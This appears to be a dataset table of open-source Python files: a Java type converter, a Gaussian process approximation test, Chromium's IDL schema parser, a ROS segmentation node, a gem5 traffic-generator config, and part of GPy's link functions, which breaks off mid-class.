| code (stringlengths 2–1.05M) | repo_name (stringlengths 5–104) | path (stringlengths 4–251) | language (stringclasses 1 value) | license (stringclasses 15 values) | size (int32 2–1.05M) |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
def get_type_name(type_name, sub_type=None):
""" Returns a Java type according to a spec type
"""
if type_name == "enum":
return type_name
elif type_name == "boolean":
return "Boolean"
elif type_name == "integer":
return "Long"
elif type_name == "time":
return "Float"
elif type_name == "object":
return "Object"
elif type_name == "list":
return type_name
elif type_name == "float":
return "Float"
else:
return "String"
def get_idiomatic_name(name):
"""
"""
if name == "private":
return "private_"
elif name == "public":
return "public_"
else:
return name
| nuagenetworks/monolithe | monolithe/generators/lang/java/converter.py | Python | bsd-3-clause | 2,306 |
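A minimal usage sketch of the converter above (assuming the module is importable from the path listed in the row): unknown spec types fall back to String, and Java keywords get a trailing underscore.

```python
# Illustrative only; the import path follows the repository layout shown above.
from monolithe.generators.lang.java.converter import get_idiomatic_name, get_type_name

assert get_type_name("integer") == "Long"
assert get_type_name("time") == "Float"
assert get_type_name("ipaddr") == "String"          # unlisted spec types map to String
assert get_idiomatic_name("private") == "private_"  # avoids the Java keyword
assert get_idiomatic_name("name") == "name"
```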
import sys
import matplotlib.pyplot as plt
import numpy as np
import sklearn.gaussian_process
import sklearn.kernel_approximation
import splitter
from appx_gaussian_processes import appx_gp
TRAINING_NUM = 1500
TESTING_NUM = 50000
ALPHA = .003
LENGTH_SCALE = 1
GAMMA = .5 / (LENGTH_SCALE ** 2)
COMPONENTS = 100
def interval_in_box_from_line(box, line):
x_min, x_max, y_min, y_max = box
m, b = line
x_min_y = m * x_min + b
x_max_y = m * x_max + b
y_min_x = (y_min - b) / m
y_max_x = (y_max - b) / m
endpoints = set()
if y_min <= x_min_y <= y_max:
endpoints.add((x_min, x_min_y))
if y_min <= x_max_y <= y_max:
endpoints.add((x_max, x_max_y))
if x_min <= y_min_x <= x_max:
endpoints.add((y_min_x, y_min))
if x_min <= y_max_x <= x_max:
endpoints.add((y_max_x, y_max))
return endpoints
def approximate_kernel(train_X, test_X):
sampler = sklearn.kernel_approximation.RBFSampler(gamma=GAMMA, n_components=COMPONENTS)
sampler.fit(train_X)
appx_train_X = sampler.transform(train_X)
appx_test_X = sampler.transform(test_X)
return appx_train_X, appx_test_X
def main(path_in):
print('Loading data...')
data = splitter.load(path_in)
(train_X, train_y), (test_X, test_y) = splitter.split(data, TRAINING_NUM,
TESTING_NUM)
try:
gp_sigmas = np.loadtxt('gp_preds.txt')
assert gp_sigmas.shape == (TESTING_NUM,)
except (FileNotFoundError, AssertionError):
print('Fitting GP...')
kernel = sklearn.gaussian_process.kernels.RBF(
length_scale=LENGTH_SCALE)
gp = sklearn.gaussian_process.GaussianProcessRegressor(
kernel=kernel,
alpha=ALPHA,
copy_X_train=False)
gp.fit(train_X, train_y)
print('Predicting GP...')
_, gp_sigmas = gp.predict(test_X, return_std=True)
np.savetxt('gp_preds.txt', gp_sigmas)
print('Approximating kernel...')
appx_train_X, appx_test_X = approximate_kernel(train_X, test_X)
print('Fitting approximate GP...')
agp = appx_gp.AppxGaussianProcessRegressor(alpha=ALPHA)
agp.fit(appx_train_X, train_y)
print('Predicting approximate GP...')
_, agp_sigmas = agp.predict(appx_test_X, return_std=True)
print('Finding best fit...')
best_fit = np.polyfit(gp_sigmas, agp_sigmas, 1)
best_fit_box = (min(gp_sigmas), max(gp_sigmas),
min(agp_sigmas), max(agp_sigmas))
best_fit_endpoints = interval_in_box_from_line(best_fit_box, best_fit)
best_fit_xs, best_fit_ys = zip(*best_fit_endpoints)
print('Plotting...')
f = plt.figure()
ax = f.add_subplot(111)
sc = plt.scatter(gp_sigmas, agp_sigmas, s=.2, c=list(test_y))
plt.plot(best_fit_xs, best_fit_ys, color='red', label='Linear fit')
plt.title(r'$\gamma = {:.4},$ #components$= {}$'.format(GAMMA,
COMPONENTS))
plt.xlabel('GP uncertainty')
plt.ylabel('Approximate GP uncertainty')
plt.text(.975, .1, '$y = {:.4}x {:+.4}$'.format(*best_fit),
horizontalalignment='right',
verticalalignment='bottom',
transform = ax.transAxes)
colorbar = plt.colorbar(sc)
colorbar.set_label('Redshift')
plt.legend(loc='lower right')
plt.show()
if __name__ == '__main__':
main(sys.argv[1])
| alasdairtran/mclearn | projects/jakub/test_appx_gp.py | Python | bsd-3-clause | 3,431 |
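The script above compares exact GP uncertainties against a random-Fourier-feature approximation; the choice GAMMA = .5 / LENGTH_SCALE ** 2 is what makes RBFSampler match sklearn's RBF kernel. A standalone sketch (synthetic data, illustrative sizes) of that equivalence:

```python
# Sketch: dot products of RBFSampler features approximate the exact RBF kernel
# when gamma = 0.5 / length_scale ** 2 (here length_scale = 1, so gamma = 0.5).
import numpy as np
from sklearn.gaussian_process.kernels import RBF
from sklearn.kernel_approximation import RBFSampler

rng = np.random.RandomState(0)
X = rng.normal(size=(200, 3))
Z = RBFSampler(gamma=0.5, n_components=5000, random_state=0).fit_transform(X)
exact = RBF(length_scale=1.0)(X)      # exp(-||x - y||^2 / (2 * length_scale^2))
approx = Z @ Z.T                      # Monte Carlo estimate of the same kernel
print(np.abs(exact - approx).max())   # small for a large number of components
```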
#! /usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import json
import os.path
import re
import sys
from json_parse import OrderedDict
# This file is a peer to json_schema.py. Each of these files understands a
# certain format describing APIs (either JSON or IDL), reads files written
# in that format into memory, and emits them as a Python array of objects
# corresponding to those APIs, where the objects are formatted in a way that
# the JSON schema compiler understands. compiler.py drives both idl_schema.py
# and json_schema.py.
# idl_parser expects to be able to import certain files in its directory,
# so let's set things up the way it wants.
_idl_generators_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
os.pardir, os.pardir, 'ppapi', 'generators')
if _idl_generators_path in sys.path:
import idl_parser
else:
sys.path.insert(0, _idl_generators_path)
try:
import idl_parser
finally:
sys.path.pop(0)
def ProcessComment(comment):
'''
Convert a comment into a parent comment and a list of parameter comments.
Function comments are of the form:
Function documentation. May contain HTML and multiple lines.
|arg1_name|: Description of arg1. Use <var>argument</var> to refer
to other arguments.
|arg2_name|: Description of arg2...
Newlines are removed, and leading and trailing whitespace is stripped.
Args:
comment: The string from a Comment node.
Returns: A tuple that looks like:
(
"The processed comment, minus all |parameter| mentions.",
{
'parameter_name_1': "The comment that followed |parameter_name_1|:",
...
}
)
'''
# Find all the parameter comments of the form '|name|: comment'.
parameter_starts = list(re.finditer(r' *\|([^|]*)\| *: *', comment))
  # Get the parent comment (everything before the first parameter comment).
first_parameter_location = (parameter_starts[0].start()
if parameter_starts else len(comment))
parent_comment = comment[:first_parameter_location]
# We replace \n\n with <br/><br/> here and below, because the documentation
# needs to know where the newlines should be, and this is easier than
# escaping \n.
parent_comment = (parent_comment.strip().replace('\n\n', '<br/><br/>')
.replace('\n', ''))
params = OrderedDict()
for (cur_param, next_param) in itertools.izip_longest(parameter_starts,
parameter_starts[1:]):
param_name = cur_param.group(1)
# A parameter's comment goes from the end of its introduction to the
# beginning of the next parameter's introduction.
param_comment_start = cur_param.end()
param_comment_end = next_param.start() if next_param else len(comment)
params[param_name] = (comment[param_comment_start:param_comment_end
].strip().replace('\n\n', '<br/><br/>')
.replace('\n', ''))
return (parent_comment, params)
class Callspec(object):
'''
Given a Callspec node representing an IDL function declaration, converts into
a tuple:
(name, list of function parameters, return type)
'''
def __init__(self, callspec_node, comment):
self.node = callspec_node
self.comment = comment
def process(self, callbacks):
parameters = []
return_type = None
if self.node.GetProperty('TYPEREF') not in ('void', None):
return_type = Typeref(self.node.GetProperty('TYPEREF'),
self.node.parent,
{'name': self.node.GetName()}).process(callbacks)
# The IDL parser doesn't allow specifying return types as optional.
# Instead we infer any object return values to be optional.
# TODO(asargent): fix the IDL parser to support optional return types.
if return_type.get('type') == 'object' or '$ref' in return_type:
return_type['optional'] = True
for node in self.node.GetChildren():
parameter = Param(node).process(callbacks)
if parameter['name'] in self.comment:
parameter['description'] = self.comment[parameter['name']]
parameters.append(parameter)
return (self.node.GetName(), parameters, return_type)
class Param(object):
'''
Given a Param node representing a function parameter, converts into a Python
dictionary that the JSON schema compiler expects to see.
'''
def __init__(self, param_node):
self.node = param_node
def process(self, callbacks):
return Typeref(self.node.GetProperty('TYPEREF'),
self.node,
{'name': self.node.GetName()}).process(callbacks)
class Dictionary(object):
'''
Given an IDL Dictionary node, converts into a Python dictionary that the JSON
schema compiler expects to see.
'''
def __init__(self, dictionary_node):
self.node = dictionary_node
def process(self, callbacks):
properties = OrderedDict()
for node in self.node.GetChildren():
if node.cls == 'Member':
k, v = Member(node).process(callbacks)
properties[k] = v
result = {'id': self.node.GetName(),
'properties': properties,
'type': 'object'}
if self.node.GetProperty('nodoc'):
result['nodoc'] = True
elif self.node.GetProperty('inline_doc'):
result['inline_doc'] = True
elif self.node.GetProperty('noinline_doc'):
result['noinline_doc'] = True
return result
class Member(object):
'''
Given an IDL dictionary or interface member, converts into a name/value pair
where the value is a Python dictionary that the JSON schema compiler expects
to see.
'''
def __init__(self, member_node):
self.node = member_node
def process(self, callbacks):
properties = OrderedDict()
name = self.node.GetName()
if self.node.GetProperty('deprecated'):
properties['deprecated'] = self.node.GetProperty('deprecated')
for property_name in ('OPTIONAL', 'nodoc', 'nocompile', 'nodart'):
if self.node.GetProperty(property_name):
properties[property_name.lower()] = True
for option_name, sanitizer in [
('maxListeners', int),
('supportsFilters', lambda s: s == 'true'),
('supportsListeners', lambda s: s == 'true'),
('supportsRules', lambda s: s == 'true')]:
if self.node.GetProperty(option_name):
if 'options' not in properties:
properties['options'] = {}
properties['options'][option_name] = sanitizer(self.node.GetProperty(
option_name))
is_function = False
parameter_comments = OrderedDict()
for node in self.node.GetChildren():
if node.cls == 'Comment':
(parent_comment, parameter_comments) = ProcessComment(node.GetName())
properties['description'] = parent_comment
elif node.cls == 'Callspec':
is_function = True
name, parameters, return_type = (Callspec(node, parameter_comments)
.process(callbacks))
properties['parameters'] = parameters
if return_type is not None:
properties['returns'] = return_type
properties['name'] = name
if is_function:
properties['type'] = 'function'
else:
properties = Typeref(self.node.GetProperty('TYPEREF'),
self.node, properties).process(callbacks)
enum_values = self.node.GetProperty('legalValues')
if enum_values:
if properties['type'] == 'integer':
enum_values = map(int, enum_values)
elif properties['type'] == 'double':
enum_values = map(float, enum_values)
properties['enum'] = enum_values
return name, properties
class Typeref(object):
'''
Given a TYPEREF property representing the type of dictionary member or
function parameter, converts into a Python dictionary that the JSON schema
compiler expects to see.
'''
def __init__(self, typeref, parent, additional_properties):
self.typeref = typeref
self.parent = parent
self.additional_properties = additional_properties
def process(self, callbacks):
properties = self.additional_properties
result = properties
if self.parent.GetPropertyLocal('OPTIONAL'):
properties['optional'] = True
# The IDL parser denotes array types by adding a child 'Array' node onto
# the Param node in the Callspec.
for sibling in self.parent.GetChildren():
if sibling.cls == 'Array' and sibling.GetName() == self.parent.GetName():
properties['type'] = 'array'
properties['items'] = OrderedDict()
properties = properties['items']
break
if self.typeref == 'DOMString':
properties['type'] = 'string'
elif self.typeref == 'boolean':
properties['type'] = 'boolean'
elif self.typeref == 'double':
properties['type'] = 'number'
elif self.typeref == 'long':
properties['type'] = 'integer'
elif self.typeref == 'any':
properties['type'] = 'any'
elif self.typeref == 'object':
properties['type'] = 'object'
if 'additionalProperties' not in properties:
properties['additionalProperties'] = OrderedDict()
properties['additionalProperties']['type'] = 'any'
instance_of = self.parent.GetProperty('instanceOf')
if instance_of:
properties['isInstanceOf'] = instance_of
elif self.typeref == 'ArrayBuffer':
properties['type'] = 'binary'
properties['isInstanceOf'] = 'ArrayBuffer'
elif self.typeref == 'FileEntry':
properties['type'] = 'object'
properties['isInstanceOf'] = 'FileEntry'
if 'additionalProperties' not in properties:
properties['additionalProperties'] = OrderedDict()
properties['additionalProperties']['type'] = 'any'
elif self.parent.GetPropertyLocal('Union'):
choices = []
properties['choices'] = [Typeref(node.GetProperty('TYPEREF'),
node,
OrderedDict()).process(callbacks)
for node in self.parent.GetChildren()
if node.cls == 'Option']
elif self.typeref is None:
properties['type'] = 'function'
else:
if self.typeref in callbacks:
# Do not override name and description if they are already specified.
name = properties.get('name', None)
description = properties.get('description', None)
properties.update(callbacks[self.typeref])
if description is not None:
properties['description'] = description
if name is not None:
properties['name'] = name
else:
properties['$ref'] = self.typeref
return result
class Enum(object):
'''
Given an IDL Enum node, converts into a Python dictionary that the JSON
schema compiler expects to see.
'''
def __init__(self, enum_node):
self.node = enum_node
self.description = ''
def process(self, callbacks):
enum = []
for node in self.node.GetChildren():
if node.cls == 'EnumItem':
enum_value = {'name': node.GetName()}
for child in node.GetChildren():
if child.cls == 'Comment':
enum_value['description'] = ProcessComment(child.GetName())[0]
else:
raise ValueError('Did not process %s %s' % (child.cls, child))
enum.append(enum_value)
elif node.cls == 'Comment':
self.description = ProcessComment(node.GetName())[0]
else:
sys.exit('Did not process %s %s' % (node.cls, node))
result = {'id' : self.node.GetName(),
'description': self.description,
'type': 'string',
'enum': enum}
for property_name in (
'inline_doc', 'noinline_doc', 'nodoc', 'cpp_omit_enum_type',):
if self.node.GetProperty(property_name):
result[property_name] = True
if self.node.GetProperty('deprecated'):
      result['deprecated'] = self.node.GetProperty('deprecated')
return result
class Namespace(object):
'''
Given an IDLNode representing an IDL namespace, converts into a Python
dictionary that the JSON schema compiler expects to see.
'''
def __init__(self,
namespace_node,
description,
nodoc=False,
internal=False,
platforms=None,
compiler_options=None,
deprecated=None):
self.namespace = namespace_node
self.nodoc = nodoc
self.internal = internal
self.platforms = platforms
self.compiler_options = compiler_options
self.events = []
self.functions = []
self.types = []
self.callbacks = OrderedDict()
self.description = description
self.deprecated = deprecated
def process(self):
for node in self.namespace.GetChildren():
if node.cls == 'Dictionary':
self.types.append(Dictionary(node).process(self.callbacks))
elif node.cls == 'Callback':
k, v = Member(node).process(self.callbacks)
self.callbacks[k] = v
elif node.cls == 'Interface' and node.GetName() == 'Functions':
self.functions = self.process_interface(node)
elif node.cls == 'Interface' and node.GetName() == 'Events':
self.events = self.process_interface(node)
elif node.cls == 'Enum':
self.types.append(Enum(node).process(self.callbacks))
else:
sys.exit('Did not process %s %s' % (node.cls, node))
if self.compiler_options is not None:
compiler_options = self.compiler_options
else:
compiler_options = {}
return {'namespace': self.namespace.GetName(),
'description': self.description,
'nodoc': self.nodoc,
'types': self.types,
'functions': self.functions,
'internal': self.internal,
'events': self.events,
'platforms': self.platforms,
'compiler_options': compiler_options,
'deprecated': self.deprecated}
def process_interface(self, node):
members = []
for member in node.GetChildren():
if member.cls == 'Member':
name, properties = Member(member).process(self.callbacks)
members.append(properties)
return members
class IDLSchema(object):
'''
Given a list of IDLNodes and IDLAttributes, converts into a Python list
of api_defs that the JSON schema compiler expects to see.
'''
def __init__(self, idl):
self.idl = idl
def process(self):
namespaces = []
nodoc = False
internal = False
description = None
platforms = None
compiler_options = None
deprecated = None
for node in self.idl:
if node.cls == 'Namespace':
if not description:
# TODO(kalman): Go back to throwing an error here.
print('%s must have a namespace-level comment. This will '
'appear on the API summary page.' % node.GetName())
description = ''
namespace = Namespace(node, description, nodoc, internal,
platforms=platforms,
compiler_options=compiler_options,
deprecated=deprecated)
namespaces.append(namespace.process())
nodoc = False
internal = False
platforms = None
compiler_options = None
elif node.cls == 'Copyright':
continue
elif node.cls == 'Comment':
description = node.GetName()
elif node.cls == 'ExtAttribute':
if node.name == 'nodoc':
nodoc = bool(node.value)
elif node.name == 'internal':
internal = bool(node.value)
elif node.name == 'platforms':
platforms = list(node.value)
elif node.name == 'implemented_in':
compiler_options = {'implemented_in': node.value}
elif node.name == 'deprecated':
deprecated = str(node.value)
else:
continue
else:
sys.exit('Did not process %s %s' % (node.cls, node))
return namespaces
def Load(filename):
'''
Given the filename of an IDL file, parses it and returns an equivalent
Python dictionary in a format that the JSON schema compiler expects to see.
'''
f = open(filename, 'r')
contents = f.read()
f.close()
idl = idl_parser.IDLParser().ParseData(contents, filename)
idl_schema = IDLSchema(idl)
return idl_schema.process()
def Main():
'''
Dump a json serialization of parse result for the IDL files whose names
were passed in on the command line.
'''
for filename in sys.argv[1:]:
schema = Load(filename)
print json.dumps(schema, indent=2)
if __name__ == '__main__':
Main()
| patrickm/chromium.src | tools/json_schema_compiler/idl_schema.py | Python | bsd-3-clause | 16,913 |
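A small sketch of what ProcessComment above produces for a function comment with |param| annotations. The file targets Python 2 (itertools.izip_longest, print statements) and importing it pulls in idl_parser, so treat this as illustrative; the comment text is made up.

```python
# Hypothetical input; ProcessComment splits it into a parent comment plus
# per-parameter descriptions keyed by the |name| markers.
from idl_schema import ProcessComment

comment = ('Does something useful.\n\n'
           '|tabId|: The id of the tab.\n'
           '|callback|: Called when the operation completes.')
parent, params = ProcessComment(comment)
# parent -> 'Does something useful.'
# params -> {'tabId': 'The id of the tab.',
#            'callback': 'Called when the operation completes.'}
```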
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
from chainer import cuda
import chainer.serializers as S
from chainer import Variable
from fcn.models import FCN32s
import numpy as np
import cv_bridge
import jsk_apc2016_common
from jsk_topic_tools import ConnectionBasedTransport
from jsk_topic_tools.log_utils import logwarn_throttle
from jsk_topic_tools.log_utils import jsk_logwarn
import message_filters
import rospy
from sensor_msgs.msg import Image
from skimage.color import label2rgb
from skimage.transform import resize
class FCNMaskForLabelNames(ConnectionBasedTransport):
mean_bgr = np.array((104.00698793, 116.66876762, 122.67891434))
def __init__(self):
super(self.__class__, self).__init__()
# set target_names
self.target_names = ['background'] + \
[datum['name']
for datum in jsk_apc2016_common.get_object_data()]
n_class = len(self.target_names)
assert n_class == 40
# load model
self.gpu = rospy.get_param('~gpu', 0)
chainermodel = rospy.get_param('~chainermodel')
self.model = FCN32s(n_class=n_class)
S.load_hdf5(chainermodel, self.model)
if self.gpu != -1:
self.model.to_gpu(self.gpu)
jsk_logwarn('>> Model is loaded <<')
while True:
self.tote_contents = rospy.get_param('~tote_contents', None)
if self.tote_contents is not None:
break
logwarn_throttle(10, 'param ~tote_contents is not set. Waiting..')
rospy.sleep(0.1)
self.label_names = rospy.get_param('~label_names')
jsk_logwarn('>> Param is set <<')
self.pub = self.advertise('~output', Image, queue_size=1)
self.pub_debug = self.advertise('~debug', Image, queue_size=1)
def subscribe(self):
self.sub_img = message_filters.Subscriber(
'~input', Image, queue_size=1, buff_size=2**24)
self.sub_mask = message_filters.Subscriber(
'~input/mask', Image, queue_size=1, buff_size=2**24)
sync = message_filters.ApproximateTimeSynchronizer(
[self.sub_img, self.sub_mask], queue_size=100, slop=0.1)
sync.registerCallback(self._callback)
def unsubscribe(self):
self.sub_img.unregister()
self.sub_mask.unregister()
def _callback(self, img_msg, mask_msg):
bridge = cv_bridge.CvBridge()
bgr_img = bridge.imgmsg_to_cv2(img_msg, desired_encoding='bgr8')
mask_img = bridge.imgmsg_to_cv2(mask_msg, desired_encoding='mono8')
if mask_img.size < 1:
logwarn_throttle(10, 'Too small sized image')
return
logwarn_throttle(10, '[FCNMaskForLabelNames] >> Start Processing <<')
if mask_img.ndim == 3 and mask_img.shape[2] == 1:
mask_img = mask_img.reshape(mask_img.shape[:2])
if mask_img.shape != bgr_img.shape[:2]:
            jsk_logwarn('Size of mask and color image is different. '
'Resizing.. mask {0} to {1}'
.format(mask_img.shape, bgr_img.shape[:2]))
mask_img = resize(mask_img, bgr_img.shape[:2],
preserve_range=True).astype(np.uint8)
blob = bgr_img - self.mean_bgr
blob = blob.transpose((2, 0, 1))
x_data = np.array([blob], dtype=np.float32)
if self.gpu != -1:
x_data = cuda.to_gpu(x_data, device=self.gpu)
x = Variable(x_data, volatile=True)
self.model(x)
pred_datum = cuda.to_cpu(self.model.score.data[0])
candidate_labels = [self.target_names.index(name)
for name in self.tote_contents]
label_pred_in_candidates = pred_datum[candidate_labels].argmax(axis=0)
label_pred = np.zeros_like(label_pred_in_candidates)
for idx, label_val in enumerate(candidate_labels):
label_pred[label_pred_in_candidates == idx] = label_val
label_pred[mask_img == 0] = 0 # set bg_label
label_viz = label2rgb(label_pred, bgr_img, bg_label=0)
label_viz = (label_viz * 255).astype(np.uint8)
debug_msg = bridge.cv2_to_imgmsg(label_viz, encoding='rgb8')
debug_msg.header = img_msg.header
self.pub_debug.publish(debug_msg)
output_mask = np.ones(mask_img.shape, dtype=np.uint8)
output_mask *= 255
for label_val, label_name in enumerate(self.target_names):
if label_name in self.label_names:
assert label_name == 'kleenex_paper_towels'
assert label_val == 21
label_mask = ((label_pred == label_val) * 255).astype(np.uint8)
contours, hierachy = cv2.findContours(
label_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(output_mask, contours, -1, 255, -1)
# output_mask[label_pred == label_val] = False
# output_mask = output_mask.astype(np.uint8)
# output_mask[output_mask == 1] = 255
output_mask[mask_img == 0] = 0
output_mask_msg = bridge.cv2_to_imgmsg(output_mask, encoding='mono8')
output_mask_msg.header = img_msg.header
self.pub.publish(output_mask_msg)
        logwarn_throttle(10, '[FCNMaskForLabelNames] >> Finished processing <<')
if __name__ == '__main__':
rospy.init_node('fcn_mask_for_label_names')
FCNMaskForLabelNames()
rospy.spin()
| start-jsk/jsk_apc | jsk_2016_01_baxter_apc/node_scripts/fcn_mask_for_label_names.py | Python | bsd-3-clause | 5,525 |
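The _callback above prepares the network input by subtracting the per-channel BGR mean and reordering HWC to CHW before adding a batch axis; a standalone sketch of that step (placeholder image, illustrative shape):

```python
# Sketch of the blob preparation used in FCNMaskForLabelNames._callback.
import numpy as np

mean_bgr = np.array((104.00698793, 116.66876762, 122.67891434))
bgr_img = np.zeros((480, 640, 3), dtype=np.float64)   # stand-in for the camera image
blob = (bgr_img - mean_bgr).transpose((2, 0, 1))      # (3, 480, 640), channel-first
x_data = np.array([blob], dtype=np.float32)           # add batch axis -> (1, 3, 480, 640)
print(x_data.shape)
```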
# Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
import m5
from m5.objects import *
# both traffic generator and communication monitor are only available
# if we have protobuf support, so potentially skip this test
require_sim_object("TrafficGen")
require_sim_object("CommMonitor")
# even if this is only a traffic generator, call it cpu to make sure
# the scripts are happy
cpu = TrafficGen(config_file = "tests/quick/se/70.tgen/tgen-dram-ctrl.cfg")
# system simulated
system = System(cpu = cpu, physmem = DDR3_1600_x64(),
membus = NoncoherentBus(width = 16),
clk_domain = SrcClockDomain(clock = '1GHz',
voltage_domain =
VoltageDomain()))
# add a communication monitor
system.monitor = CommMonitor()
# connect the traffic generator to the bus via a communication monitor
system.cpu.port = system.monitor.slave
system.monitor.master = system.membus.slave
# connect the system port even if it is not used in this example
system.system_port = system.membus.slave
# connect memory to the membus
system.physmem.port = system.membus.master
# -----------------------
# run simulation
# -----------------------
root = Root(full_system = False, system = system)
root.system.mem_mode = 'timing'
| jtyuan/racetrack | tests/configs/tgen-dram-ctrl.py | Python | bsd-3-clause | 3,365 |
# Copyright (c) 2012-2015 The GPy authors (see AUTHORS.txt)
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
import scipy
from ..util.univariate_Gaussian import std_norm_cdf, std_norm_pdf
import scipy as sp
from ..util.misc import safe_exp, safe_square, safe_cube, safe_quad, safe_three_times
class GPTransformation(object):
"""
    Link function class for approximating non-Gaussian likelihoods
    :param Y: observed output (Nx1 numpy.ndarray)
.. note:: Y values allowed depend on the likelihood_function used
"""
def __init__(self):
pass
def transf(self,f):
"""
        Gaussian process transformation function, latent space -> output space
"""
raise NotImplementedError
def dtransf_df(self,f):
"""
derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def d2transf_df2(self,f):
"""
second derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def d3transf_df3(self,f):
"""
third derivative of transf(f) w.r.t. f
"""
raise NotImplementedError
def to_dict(self):
raise NotImplementedError
def _to_dict(self):
return {}
@staticmethod
def from_dict(input_dict):
import copy
input_dict = copy.deepcopy(input_dict)
link_class = input_dict.pop('class')
import GPy
link_class = eval(link_class)
return link_class._from_dict(link_class, input_dict)
@staticmethod
def _from_dict(link_class, input_dict):
return link_class(**input_dict)
class Identity(GPTransformation):
"""
.. math::
g(f) = f
"""
def transf(self,f):
return f
def dtransf_df(self,f):
return np.ones_like(f)
def d2transf_df2(self,f):
return np.zeros_like(f)
def d3transf_df3(self,f):
return np.zeros_like(f)
def to_dict(self):
input_dict = super(Identity, self)._to_dict()
input_dict["class"] = "GPy.likelihoods.link_functions.Identity"
return input_dict
class Probit(GPTransformation):
"""
.. math::
g(f) = \\Phi^{-1} (mu)
"""
def transf(self,f):
return std_norm_cdf(f)
def dtransf_df(self,f):
return std_norm_pdf(f)
def d2transf_df2(self,f):
return -f * std_norm_pdf(f)
def d3transf_df3(self,f):
return (safe_square(f)-1.)*std_norm_pdf(f)
def to_dict(self):
input_dict = super(Probit, self)._to_dict()
input_dict["class"] = "GPy.likelihoods.link_functions.Probit"
return input_dict
class Cloglog(GPTransformation):
"""
Complementary log-log link
.. math::
p(f) = 1 - e^{-e^f}
or
f = \log (-\log(1-p))
"""
def transf(self,f):
ef = safe_exp(f)
return 1-np.exp(-ef)
def dtransf_df(self,f):
ef = safe_exp(f)
return np.exp(f-ef)
def d2transf_df2(self,f):
ef = safe_exp(f)
return -np.exp(f-ef)*(ef-1.)
def d3transf_df3(self,f):
ef = safe_exp(f)
ef2 = safe_square(ef)
three_times_ef = safe_three_times(ef)
r_val = np.exp(f-ef)*(1.-three_times_ef + ef2)
return r_val
class Log(GPTransformation):
"""
.. math::
g(f) = \\log(\\mu)
"""
def transf(self,f):
return safe_exp(f)
def dtransf_df(self,f):
return safe_exp(f)
def d2transf_df2(self,f):
return safe_exp(f)
def d3transf_df3(self,f):
return safe_exp(f)
class Log_ex_1(GPTransformation):
"""
.. math::
g(f) = \\log(\\exp(\\mu) - 1)
"""
def transf(self,f):
return scipy.special.log1p(safe_exp(f))
def dtransf_df(self,f):
ef = safe_exp(f)
return ef/(1.+ef)
def d2transf_df2(self,f):
ef = safe_exp(f)
aux = ef/(1.+ef)
return aux*(1.-aux)
def d3transf_df3(self,f):
ef = safe_exp(f)
aux = ef/(1.+ef)
daux_df = aux*(1.-aux)
return daux_df - (2.*aux*daux_df)
class Reciprocal(GPTransformation):
def transf(self,f):
return 1./f
def dtransf_df(self, f):
